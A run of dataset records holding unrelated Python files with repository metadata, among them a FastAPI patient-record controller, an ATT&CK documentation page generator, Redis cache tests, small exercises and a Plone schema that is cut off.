check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n past_injuries = {\n \"patient_id\" : str(db_patient.id),\n \"past_injury_id\" : str(past_injury.split(\",\")[i])\n }\n db_patient_past_injuries_details = models.Patient_PastInjuries(**past_injuries)\n database.add(db_patient_past_injuries_details)\n database.commit()\n database.refresh(db_patient_past_injuries_details)\n if len(past_surgery) > 0 :\n database.query(models.Patient_PastSurgeries).filter(models.Patient_PastSurgeries.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(past_surgery).split(\",\"))):\n print(f'str(past_surgery).split(\",\")[i] {str(past_surgery).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n past_surgery = {\n \"patient_id\" : str(db_patient.id),\n \"past_surgery_id\" : str(past_surgery.split(\",\")[i])\n }\n db_patient_past_surgeries_details = models.Patient_PastSurgeries(**past_surgery)\n database.add(db_patient_past_surgeries_details)\n database.commit()\n database.refresh(db_patient_past_surgeries_details)\n if len(food_preference) > 0 :\n database.query(models.Patient_FoodPreference).filter(models.Patient_FoodPreference.patient_id == str(patient_id)).delete()\n for i in range(0,len(str(food_preference).split(\",\"))):\n 
print(f'str(food_preference).split(\",\")[i] {str(food_preference).split(\",\")[i]}')\n # check_if_id_is_valid = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(patient_id),models.Patient_Allergies.allergy_id == str(allergy.split(\",\")[i])).first()\n # print(f\"check_if_id_is_valid {check_if_id_is_valid}\")\n # if check_if_id_is_valid is None:\n # return ResponseData.success_without_data(\"Allergies id is invalid\")\n food_preferences = {\n \"patient_id\" : str(db_patient.id),\n \"food_preference_id\" : str(food_preference.split(\",\")[i])\n }\n db_patient_food_preference_details = models.Patient_FoodPreference(**food_preferences)\n database.add(db_patient_food_preference_details)\n database.commit()\n database.refresh(db_patient_food_preference_details)\n database.query(models.Patient).filter(models.Patient.id == patient_id).update({ models.Patient.id : patient_id,\n models.Patient.first_name: dict2[\"first_name\"],\n models.Patient.last_name : dict2[\"last_name\"],\n models.Patient.contact_number : dict2[\"contact_number\"],\n models.Patient.profile_pic : dict2[\"profile_pic\"],\n models.Patient.email : dict2[\"email\"],\n models.Patient.gender : dict2[\"gender\"],\n models.Patient.date_of_birth : dict2[\"date_of_birth\"],\n models.Patient.blood_group : dict2[\"blood_group\"],\n # models.Patient.hospital_id : dict2[\"hospital_id\"],\n })\n database.query(models.PatientDetails).filter(models.PatientDetails.id == patient_id).update({\n models.PatientDetails.id : patient_id,\n models.PatientDetails.marital_status : dict1[\"marital_status\"],\n models.PatientDetails.height : dict1[\"height\"],\n models.PatientDetails.weight : dict1[\"weight\"],\n models.PatientDetails.emergency_contact_number : dict1[\"emergency_contact_number\"],\n models.PatientDetails.city : dict1[\"city\"],\n models.PatientDetails.smoking_habits : dict1[\"smoking_habits\"],\n models.PatientDetails.alchol_consumption : dict1[\"alchol_consumption\"],\n models.PatientDetails.activity_level : dict1[\"activity_level\"],\n models.PatientDetails.occupation : dict1[\"occupation\"] \n })\n database.flush()\n database.commit()\n # dict1.update(dict2)\n # allergies_list = database.query(models.Patient_Allergies).filter(models.Patient_Allergies.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_allergies\"] = allergies_list\n # medications_list = database.query(models.Patient_CurrentMedications).filter(models.Patient_CurrentMedications.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_current_medications\"] = medications_list\n # injuries_list = database.query(models.Patient_PastInjuries).filter(models.Patient_PastInjuries.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_past_injuries\"] = injuries_list\n # surgeries_list = database.query(models.Patient_PastSurgeries).filter(models.Patient_PastSurgeries.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_past_surgeries\"] = surgeries_list\n # food_preference_list = database.query(models.Patient_FoodPreference).filter(models.Patient_FoodPreference.patient_id == str(db_patient.id)).all()\n # dict1[\"patient_food_preference\"] = food_preference_list\n return ResponseData.success({},\"Patient details updated successfully\")\n\n\ndef get_allergies_by_id(database: Session):\n \"\"\"Function to tell user if patient with given contact number already exists or not\"\"\"\n allergies_list = database.query(models.Allergies).filter().all()\n return ResponseData.success(allergies_list,\"Allergies details fetched 
successfully\")\n # if id is None:\n # allergies_list = database.query(models.Allergies).filter().all()\n # return ResponseData.success(allergies_list,\"Allergies details fetched successfully\")\n # db_allergy_details = database.query(models.Allergies).filter(models.Allergies.id == id).first()\n # if db_allergy_details is None:\n # return ResponseData.success_without_data(\"Id is invalid or allergies does not exists\")\n # return ResponseData.success(db_allergy_details.__dict__,\"Allergies details fetched successfully\")\n\ndef add_allergy(database: Session,allergy_name):\n \"\"\"Function to add allergy\"\"\"\n if allergy_name is None:\n return ResponseData.success_without_data(\"Please provide allergy name\")\n db_allergy_details = database.query(models.Allergies).filter(models.Allergies.allergy == allergy_name).first()\n if db_allergy_details:\n return ResponseData.success_without_data(\"Allergy with this name already exists\")\n data = {\n \"allergy\" : allergy_name\n }\n db_allergy_details = models.Allergies(**data)\n database.add(db_allergy_details)\n database.commit()\n database.refresh(db_allergy_details)\n return ResponseData.success(db_allergy_details.__dict__,\"Allergy added successfully\")\n\ndef add_food_preference(database: Session,food_preference_name):\n \"\"\"Function to add food preferences\"\"\"\n if food_preference_name is None:\n return ResponseData.success_without_data(\"Please provide food preference name\")\n db_food_preference_details = database.query(models.FoodPreference).filter(models.FoodPreference.food_preference == food_preference_name).first()\n if db_food_preference_details:\n return ResponseData.success_without_data(\"Allergy with this name already exists\")\n data = {\n \"food_preference\" : food_preference_name\n }\n db_food_preference = models.FoodPreference(**data)\n database.add(db_food_preference)\n database.commit()\n database.refresh(db_food_preference)\n return ResponseData.success(db_food_preference.__dict__,\"Food preference added successfully\")\n\ndef add_current_medication(database: Session,current_medication_name):\n \"\"\"Function to add current medication\"\"\"\n if current_medication_name is None:\n return ResponseData.success_without_data(\"Please provide current medication name\")\n db_current_medication_details = database.query(models.CurrentMedications).filter(models.CurrentMedications.current_medication == current_medication_name).first()\n if db_current_medication_details:\n return ResponseData.success_without_data(\"Current medication with this name already exists\")\n data = {\n \"current_medication\" : current_medication_name\n }\n db_current_medication_details = models.CurrentMedications(**data)\n database.add(db_current_medication_details)\n database.commit()\n database.refresh(db_current_medication_details)\n return ResponseData.success(db_current_medication_details.__dict__,\"Current medication added successfully\")\n\ndef add_past_injury(database: Session,injury_name):\n \"\"\"Function to add past injury\"\"\"\n if injury_name is None:\n return ResponseData.success_without_data(\"Please provide past injury name\")\n db_injury_details = database.query(models.PastInjuries).filter(models.PastInjuries.past_injury == injury_name).first()\n if db_injury_details:\n return ResponseData.success_without_data(\"Injury with this name already exists\")\n data = {\n \"past_injury\" : injury_name\n }\n db_past_injury_details = models.PastInjuries(**data)\n database.add(db_past_injury_details)\n database.commit()\n 
database.refresh(db_past_injury_details)\n    return ResponseData.success(db_past_injury_details.__dict__,\"Past injuries added successfully\")\n\ndef add_past_surgery(database: Session,surgery_name):\n    \"\"\"Function to add past surgery\"\"\"\n    if surgery_name is None:\n        return ResponseData.success_without_data(\"Please provide past surgery name\")\n    db_surgery_details = database.query(models.PastSurgeries).filter(models.PastSurgeries.past_surgery == surgery_name).first()\n    if db_surgery_details:\n        return ResponseData.success_without_data(\"Surgery with this name already exists\")\n    data = {\n        \"past_surgery\" : surgery_name\n    }\n    db_past_surgery_details = models.PastSurgeries(**data)\n    database.add(db_past_surgery_details)\n    database.commit()\n    database.refresh(db_past_surgery_details)\n    return ResponseData.success(db_past_surgery_details.__dict__,\"Past surgeries added successfully\")\n\ndef get_current_medication_by_id(database: Session):\n    \"\"\"Function to fetch all current medications\"\"\"\n    current_medications_list = database.query(models.CurrentMedications).all()\n    return ResponseData.success(current_medications_list,\"Patient current medications details fetched successfully\")\n\ndef get_food_preferences(database: Session):\n    \"\"\"Function to fetch all food preferences\"\"\"\n    food_preferences = database.query(models.FoodPreference).all()\n    return ResponseData.success(food_preferences,\"Food preference details fetched successfully\")\n\ndef get_past_injuries_by_id(database: Session):\n    \"\"\"Function to fetch all past injuries\"\"\"\n    past_injuries_list = database.query(models.PastInjuries).all()\n    return ResponseData.success(past_injuries_list,\"Past injuries details fetched successfully\")\n\ndef get_past_surgeries_by_id(database: Session):\n    \"\"\"Function to fetch all past surgeries\"\"\"\n    past_surgeries_list = database.query(models.PastSurgeries).all()\n    return ResponseData.success(past_surgeries_list,\"Patient past surgeries details fetched successfully\")","repo_name":"RxMobile-Dummy/fastapi-HMS","sub_path":"patient/app/api/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":36312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22419694982","text":"import os\nimport json\nimport collections.abc\nimport re\nimport markdown\nfrom .. import site_config\nfrom . import groups_config\nfrom modules import util\nfrom modules.util import stixhelpers\nfrom modules.util import relationshiphelpers\n\n\ndef generate_groups():\n    \"\"\"Responsible for verifying group directory and starting off\n    group markdown generation\n    \"\"\"\n\n    # Create content pages directory if does not already exist\n    util.buildhelpers.create_content_pages_dir()\n\n    # Move templates to templates directory\n    util.buildhelpers.move_templates(groups_config.module_name, groups_config.groups_templates_path)\n\n    # Verify if directory exists\n    if not os.path.isdir(groups_config.group_markdown_path):\n        os.mkdir(groups_config.group_markdown_path)\n\n    # Generates the markdown files to be used for page generation\n    group_generated = generate_markdown_files()\n\n    if not group_generated:\n        util.buildhelpers.remove_module_from_menu(groups_config.module_name)\n\ndef generate_markdown_files():\n    \"\"\"Responsible for generating group index page and getting shared data for\n    all groups\n    \"\"\"\n\n    has_group = False\n\n    group_list = util.relationshipgetters.get_group_list()\n\n    group_list_no_deprecated_revoked = util.buildhelpers.filter_deprecated_revoked(group_list)\n\n    if group_list_no_deprecated_revoked:\n        has_group = True\n\n    if has_group:\n        data = {}\n\n        # Amount of characters per category\n        group_by = 2\n\n        notes = util.relationshipgetters.get_objects_using_notes()\n        side_menu_data = util.buildhelpers.get_side_menu_data(\"Groups\", \"/groups/\", group_list_no_deprecated_revoked)\n        data['side_menu_data'] = side_menu_data\n\n        side_menu_mobile_view_data = util.buildhelpers.get_side_menu_mobile_view_data(\"groups\", \"/groups/\", group_list_no_deprecated_revoked, group_by)\n        data['side_menu_mobile_view_data'] = side_menu_mobile_view_data\n\n        data['groups_table'] = get_groups_table_data(group_list_no_deprecated_revoked)\n        data['groups_list_len'] = str(len(group_list_no_deprecated_revoked))\n\n        subs = groups_config.group_index_md + json.dumps(data)\n\n        with open(os.path.join(groups_config.group_markdown_path, \"overview.md\"), \"w\", encoding='utf8') as md_file:\n            md_file.write(subs)\n\n        # Create the markdown for the enterprise groups in the STIX\n        for group in group_list:\n            generate_group_md(group, side_menu_data, side_menu_mobile_view_data, notes)\n\n    return has_group\n\ndef generate_group_md(group, side_menu_data, side_menu_mobile_view_data, notes):\n    \"\"\"Responsible for generating markdown of all groups\"\"\"\n\n    attack_id = util.buildhelpers.get_attack_id(group)\n\n    if attack_id:\n        data = {}\n\n        data['attack_id'] = attack_id\n\n        data['side_menu_data'] = side_menu_data\n        data['side_menu_mobile_view_data'] = 
side_menu_mobile_view_data\n        data['notes'] = notes.get(group['id'])\n\n        # External references\n        ext_ref = group[\"external_references\"]\n\n        dates = util.buildhelpers.get_created_and_modified_dates(group)\n\n        if dates.get('created'):\n            data['created'] = dates['created']\n\n        if dates.get('modified'):\n            data['modified'] = dates['modified']\n\n        if group.get(\"name\"):\n            data['name'] = group['name']\n\n        if group.get(\"x_mitre_version\"):\n            data['version'] = group[\"x_mitre_version\"]\n\n        if isinstance(group.get(\"x_mitre_contributors\"), collections.abc.Iterable):\n            data['contributors_list'] = group[\"x_mitre_contributors\"]\n\n        # Get initial reference list\n        reference_list = {'current_number': 0}\n\n        # Get initial reference list from group object\n        reference_list = util.buildhelpers.update_reference_list(reference_list, group)\n\n        if group.get(\"description\"):\n            data['descr'] = group['description']\n\n        if group.get('x_mitre_deprecated'):\n            data['deprecated'] = True\n\n        # Get technique data for techniques used table\n        data['technique_table_data'] = get_techniques_used_by_group_data(group, reference_list)\n\n        # Get navigator layers for this group\n        layers = util.buildhelpers.get_navigator_layers(\n            data['name'],\n            data[\"attack_id\"],\n            \"group\",\n            data[\"version\"] if \"version\" in data else None,\n            data['technique_table_data'],\n        )\n\n        data[\"layers\"] = []\n        for layer in layers:\n            with open(os.path.join(groups_config.group_markdown_path, \"-\".join([data['attack_id'], \"techniques\", layer[\"domain\"]]) + \".md\"), \"w\", encoding='utf8') as layer_json:\n                subs = site_config.layer_md.substitute({\n                    \"attack_id\": data[\"attack_id\"],\n                    \"path\": \"groups/\" + data[\"attack_id\"],\n                    \"domain\": layer[\"domain\"]\n                })\n                subs = subs + layer[\"layer\"]\n                layer_json.write(subs)\n            data[\"layers\"].append({\n                \"domain\": layer[\"domain\"],\n                \"filename\": \"-\".join([data[\"attack_id\"], layer[\"domain\"], \"layer\"]) + \".json\",\n                \"navigator_link\" : site_config.navigator_link\n            })\n\n        # Grab software data for Software table\n        data['software_data'], data['add_software_ref'] = get_software_table_data(group, reference_list)\n\n        if group.get('aliases'):\n            data['alias_descriptions'] = util.buildhelpers.get_alias_data(group['aliases'][1:], ext_ref)\n\n        data['citations'] = reference_list\n\n        if isinstance(group.get(\"aliases\"), collections.abc.Iterable):\n            data['aliases_list'] = group[\"aliases\"][1:]\n\n        data['versioning_feature'] = site_config.check_versions_module()\n\n        subs = groups_config.group_md.substitute(data)\n        subs = subs + json.dumps(data)\n\n        # Write out the markdown file\n        with open(os.path.join(groups_config.group_markdown_path, data['attack_id'] + \".md\"), \"w\", encoding='utf8') as md_file:\n            md_file.write(subs)\n\ndef get_groups_table_data(group_list):\n    \"\"\"Responsible for generating group table data for the group index page\"\"\"\n\n    groups_table_data = []\n\n    # Now the table on the right, which is made up of group data\n    for group in group_list:\n\n        attack_id = util.buildhelpers.get_attack_id(group)\n\n        if attack_id:\n            row = {}\n\n            row['id'] = attack_id\n\n            if group.get(\"name\"):\n                row['name'] = group['name']\n\n            if group.get(\"description\"):\n                row['descr'] = group[\"description\"]\n\n            if group.get('x_mitre_deprecated'):\n                row['deprecated'] = True\n\n            if isinstance(group.get(\"aliases\"), collections.abc.Iterable):\n                row['aliases_list'] = group[\"aliases\"][1:]\n\n            groups_table_data.append(row)\n\n    return groups_table_data\n\ndef get_techniques_used_by_group_data(group, 
reference_list):\n \"\"\"Given a group and its reference list, get the techniques used by the\n group. Check the reference list for citations, if not found\n in list, add it.\n \"\"\"\n \n technique_list = {}\n\n techniques_used_by_groups = util.relationshipgetters.get_techniques_used_by_groups()\n\n if techniques_used_by_groups.get(group.get('id')):\n for technique in techniques_used_by_groups[group['id']]:\n # Do not add if technique is deprecated\n if not technique['object'].get('x_mitre_deprecated'):\n technique_list = util.buildhelpers.technique_used_helper(technique_list, technique, reference_list)\n\n technique_data = []\n for item in technique_list:\n technique_data.append(technique_list[item])\n # Sort by technique name\n technique_data = sorted(technique_data, key=lambda k: k['name'].lower())\n\n # Sort by domain name\n technique_data = sorted(technique_data, key=lambda k: [site_config.custom_alphabet.index(c) for c in k['domain'].lower()])\n return technique_data\n\ndef get_software_table_data(group, reference_list):\n \"\"\"Given a group, get software table data\"\"\"\n\n software_list = {}\n\n reference = False\n\n # Creating map for tools/malware used by groups \n # and techniques used by malware/tools\n tools_and_malware = [{\n 'software': util.relationshipgetters.get_tools_used_by_groups(), \n 'techniques': util.relationshipgetters.get_techniques_used_by_tools()\n }, \n {\n 'software': util.relationshipgetters.get_malware_used_by_groups(),\n 'techniques': util.relationshipgetters.get_techniques_used_by_malware()\n }]\n\n # Get malware or tools used by group\n for pairing in tools_and_malware:\n if pairing['software'].get(group.get('id')):\n for software in pairing['software'][group['id']]:\n\n software_id = software['object']['id']\n\n # Check if software not already in software_list dict\n if software_id not in software_list:\n\n attack_id = util.buildhelpers.get_attack_id(software['object'])\n \n if attack_id:\n software_list[software_id] = {}\n\n software_list[software_id]['id'] = attack_id\n software_list[software_id]['name'] = software['object']['name']\n\n if software['relationship'].get('description'):\n if reference == False:\n reference = True\n\n # Get filtered description\n software_list[software_id]['descr'] = software['relationship']['description']\n # Update reference list\n reference_list = util.buildhelpers.update_reference_list(reference_list, software['relationship'])\n\n # Check if techniques exists, add techniques used by software\n if pairing['techniques'].get(software_id):\n \n if 'techniques' not in software_list[software_id]:\n software_list[software_id]['techniques'] = []\n\n for technique in pairing['techniques'][software_id]:\n\n tech_data = {}\n\n t_id = util.buildhelpers.get_attack_id(technique['object'])\n\n if t_id:\n if util.buildhelpers.is_sub_tid(t_id):\n tech_data['parent_id'] = util.buildhelpers.get_parent_technique_id(t_id)\n tech_data['id'] = util.buildhelpers.get_sub_technique_id(t_id)\n tech_data['name'] = util.buildhelpers.get_technique_name(tech_data['parent_id'])\n tech_data['sub_name'] = technique['object']['name']\n else:\n tech_data['id'] = t_id\n tech_data['name'] = technique['object']['name']\n\n software_list[software_id]['techniques'].append(tech_data)\n\n # Moving it to an array because jinja does not like to loop\n # through dictionaries\n data = []\n for item in software_list:\n if \"techniques\" in software_list[item]:\n software_list[item]['techniques'] = sorted(software_list[item]['techniques'], key=lambda k: 
k['name'].lower())\n            data.append(software_list[item])\n    data = sorted(data, key=lambda k: k['name'].lower())\n\n    return data, reference","repo_name":"276793422/attack-website","sub_path":"modules/groups/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":11914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"37300220844","text":"class Solution:\n    def longestSquareStreak(self, nums: List[int]) -> int:\n        nums.sort(reverse = True)\n        l = {}\n        for el in nums:\n            if el * el in l:\n                l[el] = l[el * el] + 1\n            else:\n                l[el] = 1\n        res = max(l.values())\n        if res < 2:\n            return -1\n        return res","repo_name":"theabbie/leetcode","sub_path":"longest-square-streak-in-an-array.py","file_name":"longest-square-streak-in-an-array.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"34674033023","text":"import requests\r\n\r\n# To avoid having candidates, remove the comments and the db\r\n\r\n#conn = sqlite3.connect('data_full.db')\r\n#cursor = conn.cursor()\r\n\r\n\r\nimport pandas as pd\r\nfrom pre_training import *\r\nimport numpy as np\r\n\r\ndf = pd.read_csv(\"data_questionnaires.csv\",sep = \";\")\r\ndf = df.drop(columns = [\"ID de la réponse\",\"Date de soumission\",\"Dernière page\", \"Langue de départ\",\"Tête de série\", \"Date de lancement\", \"Date de la dernière action\"])\r\nnames_columns = df.columns\r\n\r\n\r\n\r\n# 22: the high-school name is in column 22\r\n\r\n\r\n\r\ndef adresse_to_coordonnees(string):\r\n    def string_to_request(string):\r\n        replace = string.replace(\" \",\"+\")\r\n        return replace\r\n    url = 'https://nominatim.openstreetmap.org/search.php?q=' + string_to_request(string) + '&format=jsonv2'\r\n    response = requests.get(url)\r\n    if response.json() != []:\r\n        json = response.json()[0]\r\n        latitude = float(json[\"lat\"])\r\n        longitude = float(json[\"lon\"])\r\n        boolean = True\r\n    else:\r\n        boolean = False\r\n        latitude = 0\r\n        longitude = 0\r\n    return boolean,longitude,latitude\r\n\r\ndef make_coord(df):\r\n    colonne_lycee = df[df.columns[22]]\r\n    liste_longitude = []\r\n    liste_latitude = []\r\n    liste_index = []\r\n    for index,lycee in enumerate(colonne_lycee):\r\n        try:\r\n            boolean,longitude,latitude = adresse_to_coordonnees(lycee)\r\n            if boolean:\r\n                print(longitude,latitude)\r\n                liste_index.append(index)\r\n                liste_longitude.append(longitude)\r\n                liste_latitude.append(latitude)\r\n            else:\r\n                print(\"to look up manually\")\r\n        except:\r\n            print(\"not provided\")\r\n    return liste_index,liste_latitude,liste_longitude\r\n    \r\n\r\n\r\n","repo_name":"ProfesseurGibaud/HGGSP_Data_Science","sub_path":"coord lycée.py","file_name":"coord lycée.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25805627570","text":"import time\nfrom datetime import datetime\n\nfrom models.Job import Job\n\n\ndef current_timestamp():\n    return int(datetime.timestamp(datetime.now()))\n\n\ndef lambda_handler(event, context):\n    print('Incoming event: {}'.format(event))\n    processed_jobs = []\n    for record in event['Records']:\n        # registering job\n        job_id = record['messageId']\n        new_job = Job(job_id=job_id, status='CREATED',\n                      creation_date=current_timestamp())\n        new_job.save()\n\n        # job processing code here\n        time.sleep(2)\n\n        # update job status\n        new_job.status = 'DONE'\n        new_job.last_updated_data_sec = current_timestamp()\n        new_job.save()\n        
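# collect the job id so the handler can report all jobs processed in this batch\n        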
processed_jobs.append(job_id)\n    return 'Jobs processed: {}'.format(processed_jobs)\n","repo_name":"epam/aws-syndicate","sub_path":"examples/python/demo/sample-python-project/lambdas/job-processor/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"18"} +{"seq_id":"72196041641","text":"from flask import Flask, request, render_template\nfrom random import randint\n\napp = Flask(__name__)\n\ndef roll_dice():\n    result = randint(1,6)\n    return result\n\n@app.route('/')\ndef index():\n    section = 'Greetings, human'\n    return render_template('index.html',\n                           section=section)\n\n\n@app.route('/dice')\ndef play_dice_game():\n    name = request.args.get('name')\n    die1 = roll_dice()\n    die2 = roll_dice()\n\n    if die1 == die2:\n        return \"You won! You rolled \" + str(die1) + \" and \" + str(die2) + \".\"\n\n    return render_template('dice.html',\n                           name=name,\n                           die1=die1,\n                           die2=die2)\n\nif __name__ == '__main__':\n    app.run(debug=True)","repo_name":"aucoeur/dice_game","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12449624317","text":"from datetime import timedelta\nfrom time import sleep\nfrom typing import Iterable\n\nfrom pytest import fixture, raises\n\nfrom cachetory.backends.sync import RedisBackend\nfrom cachetory.private.datetime import make_deadline\nfrom tests.support import if_redis_enabled\n\n\n@fixture\ndef backend() -> Iterable[RedisBackend]:\n    with RedisBackend.from_url(\"redis://localhost:6379\") as backend:\n        backend.clear()\n        try:\n            yield backend\n        finally:\n            backend.clear()\n\n\n@if_redis_enabled\ndef test_get_existing(backend: RedisBackend) -> None:\n    backend.set(\"foo\", b\"hello\")\n    assert backend.get(\"foo\") == b\"hello\"\n\n\n@if_redis_enabled\ndef test_get_missing(backend: RedisBackend) -> None:\n    with raises(KeyError):\n        backend.get(\"foo\")\n\n\n@if_redis_enabled\ndef test_set_default(backend: RedisBackend) -> None:\n    assert backend.set(\"foo\", b\"hello\", if_not_exists=True)\n    assert not backend.set(\"foo\", b\"world\", if_not_exists=True)\n    assert backend.get(\"foo\") == b\"hello\"\n\n\n@if_redis_enabled\ndef test_delete_existing(backend: RedisBackend) -> None:\n    backend.set(\"foo\", b\"hello\")\n    assert backend.delete(\"foo\")\n    with raises(KeyError):\n        backend.get(\"foo\")\n\n\n@if_redis_enabled\ndef test_delete_missing(backend: RedisBackend) -> None:\n    assert not backend.delete(\"foo\")\n\n\n@if_redis_enabled\ndef test_set_get_many(backend: RedisBackend) -> None:\n    backend.set_many([(\"non-empty\", b\"foo\"), (\"empty\", b\"\")])\n    assert list(backend.get_many(\"non-empty\", \"missing\", \"empty\")) == [(\"non-empty\", b\"foo\"), (\"empty\", b\"\")]\n\n\n@if_redis_enabled\ndef test_set_with_ttl(backend: RedisBackend) -> None:\n    backend.set(\"foo\", b\"bar\", time_to_live=timedelta(seconds=0.25))\n    assert backend.get(\"foo\") == b\"bar\"\n    sleep(0.5)\n    with raises(KeyError):\n        backend.get(\"foo\")\n\n\n@if_redis_enabled\ndef test_expire_at(backend: RedisBackend) -> None:\n    backend.set(\"foo\", b\"bar\")\n    backend.expire_at(\"foo\", make_deadline(timedelta(seconds=0.25)))\n    assert backend.get(\"foo\") == b\"bar\"\n    sleep(0.5)\n    with raises(KeyError):\n        backend.get(\"foo\")\n\n\n@if_redis_enabled\ndef test_expire_in(backend: RedisBackend) -> None:\n    backend.set(\"foo\", 
b\"bar\")\n backend.expire_in(\"foo\", timedelta(seconds=0.25))\n assert backend.get(\"foo\") == b\"bar\"\n sleep(0.5)\n with raises(KeyError):\n backend.get(\"foo\")\n\n\n@if_redis_enabled\nasync def test_clear(backend: RedisBackend) -> None:\n backend.set(\"foo\", b\"bar\")\n backend.clear()\n with raises(KeyError):\n backend.get(\"foo\")\n\n\n@if_redis_enabled\ndef test_get_empty_value(backend: RedisBackend) -> None:\n backend.set(\"foo\", b\"\")\n assert backend.get(\"foo\") == b\"\"\n","repo_name":"kpn/cachetory","sub_path":"tests/backends/sync/test_redis.py","file_name":"test_redis.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"22040924232","text":"# 문자열을 내림차순 배치\n\n# 문자열 s에 나타나는 문자를 큰것부터 작은 순으로 정렬해 새로운 문자열을 리턴하는 함수, solution을 완성해주세요.\n\n# s는 영문 대소문자로만 구성되어 있으며, 대문자는 소문자보다 작은 것으로 간주합니다.\n\ndef solution(s):\n\n answer = ''\n\n upper_lower = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\n\n s_index = [] # s의 인덱스 배열\n\n for char in s:\n idx = upper_lower.index(char)\n s_index.append(idx)\n\n s_index = sorted(s_index, reverse=True)\n\n for i in range(len(s_index)):\n answer += upper_lower[s_index[i]]\n \n return answer\n\n\nprint(solution(\"Zbcdefg\")) # \"gfedcbZ\"\n","repo_name":"glory0224/Algorithm","sub_path":"Programmers/Level1/String/arrange_string_descending.py","file_name":"arrange_string_descending.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8222278655","text":"import pandas as pd\n\nfrom scripts.params import PARAMS, age_ranger\n\ndef transform(data_obj, batch=False) -> pd.DataFrame:\n\n\t# Initialization\n\tif batch:\n\t\tdf = pd.read_csv(data_obj)\n\n\telse:\n\t\tdf = pd.DataFrame(data_obj).T\n\t\tdf.columns = ['country', 'sex', 'age']\n\n\t # Transformation\n\t\t\n\tdf['country'] = df.country.apply(lambda x:x.lower())\n\tdf['country'] = df.country.replace(PARAMS['country_list'])\n\tdf['sex'] = df.sex.replace(PARAMS['sex_list'])\n\tdf['age'] = pd.to_numeric(df['age'])\n\tdf['age'] = df.age.apply(age_ranger)\n\n\n\n\treturn df\n","repo_name":"LukaPerkovic/mle-course-homeworks","sub_path":"deployment_hw/scripts/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34439723429","text":"f = open('day1input.txt')\nfloor = f.readline()\n\n#part 1\ny = 0\nfor x in floor:\n if x == '(':\n y += 1\n elif x == ')':\n y -= 1\nprint(y)\n\n#part 2\ny = 0\ncount = 0\nfor x in floor:\n if y >= 0:\n if x == '(':\n y += 1\n elif x == ')':\n y -= 1\n count += 1\nprint(count)\n","repo_name":"coreymizzou/AdventOfCode","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41839950926","text":"# coding=utf-8\n# 代码文件:chapter22/ch22.1.5.py\n\nimport matplotlib.pyplot as plt\n\n# 设置中文字体\nplt.rcParams['font.family'] = ['SimHei']\n\n# 各种活动标题列表\nactivies = ['工作', '睡', '吃', '玩']\n# 各种活动所占时间列表\nslices = [8, 7, 3, 6]\n# 各种活动在饼状图中的颜色列表\ncols = ['c', 'm', 'r', 'b']\n\nplt.pie(slices, labels=activies, colors=cols,\n shadow=True, explode=(0, 0.1, 0, 0), autopct='%.1f%%')\n\nplt.title('绘制饼状图')\n\nplt.show() # 
display the figure\n","repo_name":"tonyguan/python1","sub_path":"code/chapter22/ch22.1.5.py","file_name":"ch22.1.5.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"zh","doc_type":"code","stars":23,"dataset":"github-code","pt":"18"} +{"seq_id":"415704970","text":"# -*- coding: utf-8 -*-\nfrom ts16.content import _\n# from plone.autoform import directives\n#from plone.supermodel import directives\nfrom zope import schema\nfrom plone.autoform.interfaces import IFormFieldProvider\nfrom plone.supermodel import model\nfrom zope.component import adapts\nfrom zope.interface import alsoProvides, implements\nfrom zope.interface import provider\n#from z3c.relationfield.schema import RelationList, RelationChoice\n#from plone.app.vocabularies.catalog import CatalogSource\nfrom plone.dexterity.interfaces import IDexterityContent\n#from plone.directives import dexterity\nfrom plone.app.textfield import RichText\n#from plone.app.content.interfaces import INameFromTitle\nfrom plone.namedfile.field import NamedBlobImage, NamedBlobFile\n#from DateTime import DateTime\n#import random\n#from plone.directives import form\n\n\nclass IBigImage(model.Schema):\n    \"\"\" Add bigImage_* field \"\"\"\n\n    model.fieldset(\n        'bigImage',\n        label=_(u\"bigImage\"),\n        fields=['bigImage_1', 'photoer_1', 'bigImage_2', 'photoer_2', 'bigImage_3', 'photoer_3',\n                'bigImage_4', 'photoer_4', 'bigImage_5', 'photoer_5', ]\n    )\n\n    model.fieldset(\n        'english',\n        label=_(u\"English\"),\n        